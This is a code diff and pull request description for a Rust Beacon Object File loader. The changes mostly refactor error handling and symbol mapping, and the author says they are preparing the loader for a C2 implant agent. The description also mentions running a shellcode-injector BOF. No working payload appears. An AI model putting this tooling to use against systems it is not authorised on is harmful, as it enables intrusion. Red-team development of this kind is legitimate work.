         self.buffer
-            .write_u32::<LittleEndian>((s_bytes.len() + 1) as u32)
-            .unwrap();
-        self.buffer.write_all(s_bytes).unwrap();
-        self.buffer.write_u8(0).unwrap();
+            .write_u32::<LittleEndian>((s_bytes.len() + 1) as u32)?;
+        self.buffer.write_all(s_bytes)?;
+        self.buffer.write_u8(0)?;
         self.size += (s_bytes.len() + 1) as u32 + 4;
+        Ok(())
     }
 
     /// `add_wstr` adds a wide string to the buffer
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as a wide string
-    pub fn add_wstr(&mut self, wstr: &str) {
+    pub fn add_wstr(&mut self, wstr: &str) -> Result<(), Box<dyn std::error::Error>> {
         let s_bytes = wstr.encode_utf16().collect::<Vec<u16>>();
         self.buffer
-            .write_u32::<LittleEndian>(((s_bytes.len() * 2) + 2) as u32)
-            .unwrap();
+            .write_u32::<LittleEndian>(((s_bytes.len() * 2) + 2) as u32)?;
         for c in &s_bytes {
-            self.buffer.write_u16::<LittleEndian>(*c).unwrap();
+            self.buffer.write_u16::<LittleEndian>(*c)?;
         }
-        self.buffer.write_u16::<LittleEndian>(0).unwrap();
+        self.buffer.write_u16::<LittleEndian>(0)?;
         self.size += ((s_bytes.len() * 2) + 2) as u32 + 4;
+        Ok(())
     }
 
     /// `add_bin` adds binary data to the buffer
-    ///
-    /// # Panics
-    /// Panics if the buffer cannot be written as binary data
-    pub fn add_bin(&mut self, bin: &[u8]) {
-        self.buffer
-            .write_u32::<LittleEndian>(bin.len() as u32)
-            .unwrap();
-        self.buffer.write_all(bin).unwrap();
+    pub fn add_bin(&mut self, bin: &[u8]) -> Result<(), Box<dyn std::error::Error>> {
+        self.buffer.write_u32::<LittleEndian>(bin.len() as u32)?;
+        self.buffer.write_all(bin)?;
         self.size += (bin.len() as u32) + 4;
+        Ok(())
     }
 }
 

--- a/src/loader/beacon_pack.rs
+++ b/src/loader/beacon_pack.rs
@@ -7,10 +7,10 @@ pub struct BeaconPack {
     pub size: u32,
 }
 
-/// BeaconPack is a struct that contains a buffer and size
+/// `BeaconPack` is a struct that contains a buffer and size
 /// The buffer is used to store the data that will be sent to the BOF's arguments
 impl BeaconPack {
-    /// new returns a new BeaconPack
+    /// `new` returns a new `BeaconPack`
     pub fn new() -> BeaconPack {
         BeaconPack {
             buffer: vec![],
@@ -18,7 +18,10 @@ impl BeaconPack {
         }
     }
 
-    /// get_buffer returns the buffer with the size prepended
+    /// `get_buffer` returns the buffer with the size prepended
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as an u32
     pub fn get_buffer(&self) -> Vec<u8> {
         let mut result = vec![];
         result.write_u32::<LittleEndian>(self.size).unwrap();
@@ -26,19 +29,28 @@ impl BeaconPack {
         result
     }
 
-    /// add_short adds a short to the buffer
+    /// `add_short` adds a short to the buffer
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as a i16
     pub fn add_short(&mut self, short: i16) {
         self.buffer.write_i16::<LittleEndian>(short).unwrap();
         self.size += 2;
     }
 
-    /// add_int adds an int to the buffer
+    /// `add_int` adds an int to the buffer
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as a i32
     pub fn add_int(&mut self, int: i32) {
         self.buffer.write_i32::<LittleEndian>(int).unwrap();
         self.size += 4;
     }
 
-    /// add_str adds a string to the buffer
+    /// `add_str` adds a string to the buffer
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as a string
     pub fn add_str(&mut self, str: &str) {
         let s_bytes = str.as_bytes();
         self.buffer
@@ -49,7 +61,10 @@ impl BeaconPack {
         self.size += (s_bytes.len() + 1) as u32 + 4;
     }
 
-    /// add_wstr adds a wide string to the buffer
+    /// `add_wstr` adds a wide string to the buffer
+    ///
+    /// # Panics
+    /// Panics if the buffer cannot be written as a wide string
     pub fn add_wstr(&mut self, wstr: &str) {
         let s_bytes = wstr.encode_utf16().collect::<Vec<u16>>();
         self.buffer
@@ -60,5 +75,11 @@ impl BeaconPack {
         }
         self.buffer.write_u16::<LittleEndian>(0).unwrap();
         self.size += ((s_bytes.len() * 2) + 2) as u32 + 4;
+    }
+}
+
+impl Default for BeaconPack {
+    fn default() -> Self {
+        Self::new()
     }
 }

--- a/src/loader/mod.rs
+++ b/src/loader/mod.rs
@@ -125,7 +125,7 @@ impl<'a> Coffee<'a> {
         self.allocate_bof_memory()?;
 
         // Execute the bof
-        self.execute_bof(arguments, argument_size, entrypoint_name);
+        self.execute_bof(arguments, argument_size, entrypoint_name)?;
 
         // Get the output and print it
         let output_data = beacon_get_output_data();
@@ -731,7 +731,7 @@ impl<'a> Coffee<'a> {
         arguments: Option<*const u8>,
         argument_size: Option<usize>,
         entrypoint_name: &Option<String>,
-    ) {
+    ) -> Result<(), Box<dyn std::error::Error>> {
         // Check if any of the data-processing functions are present on the mapped functions
         // If so, throw a warning about the arguments
         let mapped_function_names =
@@ -760,8 +760,8 @@ impl<'a> Coffee<'a> {
             .any(|x| data_functions.contains(&x.as_str()))
             && argument_size.unwrap_or(0) <= 4
         {
-            warn!(
-                "This BOF expects arguments, but none were provided. Please check the provided arguments."
+            return Err(
+                "This BOF expects arguments, but none were provided. Please check the provided arguments.".into()
             );
         }
 
@@ -802,6 +802,7 @@ impl<'a> Coffee<'a> {
                 }
             }
         }
+        Ok(())
     }
 
     /// Iterates through each section and frees the memory allocated for each section using `VirtualFree`.

--- a/src/loader/mod.rs
+++ b/src/loader/mod.rs
@@ -211,12 +211,13 @@ impl<'a> Coffee<'a> {
 
         // Check if `polished_symbol_name` is already in mapping_list as the 'name' property
         // If it is, we already resolved it, so we can return early
-        for i in 0..mapping_list.len {
-            if mapping_list.list[i].name == polished_import_name.unwrap() {
-                debug!("Symbol already mapped: {}", polished_import_name.unwrap());
-                return Ok(mapping_list.list[i].address);
-            }
-        }
+        // TODO
+        // for i in 0..mapping_list.len {
+        //     if mapping_list.list[i].name == polished_import_name.unwrap() {
+        //         debug!("Symbol already mapped: {}", polished_import_name.unwrap());
+        //         return Ok(mapping_list.list[i].address);
+        //     }
+        // }
 
         // Check if the symbol is external or internal
         if polished_import_name.unwrap().contains('$') {
@@ -283,7 +284,8 @@ impl<'a> Coffee<'a> {
         mapping_list.push(mapped_func_entry);
 
         // Return the address of the mapped function
-        Ok(symbol_address)
+        let allocated_address = &mapping_list.list.as_ref()[mapping_list.len - 1];
+        Ok(std::ptr::from_ref(&allocated_address.address) as usize)
     }
 
     /// Allocates all the memory needed for each relocation and section.

--- a/src/loader/mod.rs
+++ b/src/loader/mod.rs
@@ -270,7 +270,7 @@ impl<'a> Coffee<'a> {
                 info!("Resolving internal import: {}", polished_import_name);
                 let internal_func_address = get_function_ptr(polished_import_name);
 
-                symbol_address = internal_func_address;
+                symbol_address = internal_func_address?;
             } else {
                 warn!("Unknown internal symbol: {}", polished_import_name);
             }
@@ -600,10 +600,11 @@ impl<'a> Coffee<'a> {
                                                 }
                                             }
                                             _ => {
-                                                panic!(
+                                                return Err(format!(
                                                     "Unsupported relocation type: {:#?}",
                                                     relocation.typ
-                                                );
+                                                )
+                                                .into());
                                             }
                                         }
                                     } else if self.is_x86()? {
@@ -702,10 +703,11 @@ impl<'a> Coffee<'a> {
                                                 }
                                             }
                                             _ => {
-                                                panic!(
+                                                return Err(format!(
                                                     "Unsupported relocation type: {:#?}",
                                                     relocation.typ
-                                                );
+                                                )
+                                                .into());
                                             }
                                         }
                                     }

--- a/src/loader/mod.rs
+++ b/src/loader/mod.rs
@@ -211,13 +211,17 @@ impl<'a> Coffee<'a> {
 
         // Check if `polished_symbol_name` is already in mapping_list as the 'name' property
         // If it is, we already resolved it, so we can return early
-        // TODO
-        // for i in 0..mapping_list.len {
-        //     if mapping_list.list[i].name == polished_import_name.unwrap() {
-        //         debug!("Symbol already mapped: {}", polished_import_name.unwrap());
-        //         return Ok(mapping_list.list[i].address);
-        //     }
-        // }
+        for i in 0..mapping_list.len {
+            if mapping_list.list[i].name == polished_import_name.unwrap() {
+                debug!(
+                    "Symbol already mapped: {}: {:#x}",
+                    polished_import_name.unwrap(),
+                    mapping_list.list[i].address
+                );
+                let allocated_address = &mapping_list.list.as_ref()[i];
+                return Ok(std::ptr::from_ref(&allocated_address.address) as usize);
+            }
+        }
 
         // Check if the symbol is external or internal
         if polished_import_name.unwrap().contains('$') {

--- a/src/main.rs
+++ b/src/main.rs
@@ -144,11 +144,14 @@ fn main() -> Result<()> {
     // Execute the BOF
     // TODO: Arguments as Option<&[u8]>
     info!("Loading BOF: {}", args.bof_path.display());
-    let output = Coffee::new(coff_buffer.as_slice())?.execute(
-        Some(unhexilified.as_ptr()),
-        Some(unhexilified.len()),
-        &args.entrypoint,
-    )?;
+    let output = Coffee::new(coff_buffer.as_slice())
+        .map_err(|e| Report::msg(format!("Error loading BOF: {e}")))?
+        .execute(
+            Some(unhexilified.as_ptr()),
+            Some(unhexilified.len()),
+            &args.entrypoint,
+        )
+        .map_err(|e| Report::msg(format!("Error executing BOF: {e}")))?;
 
     println!("Execution output: {output}");
 


### PR DESCRIPTION
Hi! Thanks again for your great project. As mentioned - I am currently preparing to integrate parts of the `coffee-ldr` codebase into the coming Rust-based agent of [Nimplant](https://github.com/chvancooten/nimplant). As part of this integration, I made quite some changes to the codebase, which I propose to integrate in the main branch and tag it `0.2.0`.

I appreciate that these are some major changes and they may take some review, or that some changes don't entirely fit your vision for the library. Let me know and I'll be happy to clarify or modify!

A summary of the changes is below:

- **Add `bin` argument type** https://github.com/hakaioffsec/coffee/commit/3b2b678064b4b5c121ea1f17cb35265021eaca99
  This change is fairly simple but was a requirement for me: It implements the `bin` argument type which simply [adds the given bytes to the buffer](https://github.com/hakaioffsec/coffee/blob/bb98b5e3e1356835021b950fd0bea19e92116f56/src/loader/beacon_pack.rs#L68-L75). To do this, it base64-decodes the arguments given on the commandline (for this it requires the `base64` dependency). An example for using the `bin` argtype to run one of TrustedSec's shellcode injector BOF's was added to the README.

- **Overhaul error handling**
  This change removes all (unsafe) `unwrap()` calls and usage of the `assert!()` macro to ensure that the library itself doesn't panic when something goes wrong. Instead, the function signatures in the library are update to propagate errors downstream so that the caller can handle them gracefully. This was essential for my use case, as any unexpected panic would crash the implant which is clearly undesirable :)

  Note: To maximize compatibility, I used `std::result::Result` in the library with a `Box<dyn std::error::Error>` error type where appropriate. The `main.rs` file still uses `color_eyre::Result` combined with proper error handling to format any (unexpected) errors from the library.

- **Bump dependencies** https://github.com/hakaioffsec/coffee/commit/745fefeeb6589513747aa2f089d22f4316a8bf50 
  This commit bumps the `goblin`, `windows`, and `windows-sys` dependencies to their latest versions. Since some upstream changes were breaking (mostly updated return values for used functions), this commit also makes the appropriate fixes to account for this.

- **Refactoring**
  Quite some code has been modified based on idiomatic best practices and suggestions from my linter (`clippy::pedantic`). Annotations have been added to accept linting violations where relevant. Some functions or logic conditions have been re-written to improve readability or performance.